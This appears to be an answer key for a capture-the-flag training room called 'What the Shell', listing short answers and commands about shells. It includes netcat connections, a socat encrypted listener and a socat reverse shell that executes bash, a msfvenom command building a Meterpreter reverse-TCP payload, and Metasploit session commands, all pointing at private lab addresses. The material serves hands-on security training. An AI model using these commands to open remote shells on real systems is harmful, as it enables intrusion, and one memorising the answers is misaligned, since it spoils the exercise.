What the Shell

R

N

T

-l

nc 10.10.10.11 8080

stty cols 238

sudo python3 -m http.server 80

TCP-L:8080

socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

mkfifo

_

msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443

exploit -j

sessions 10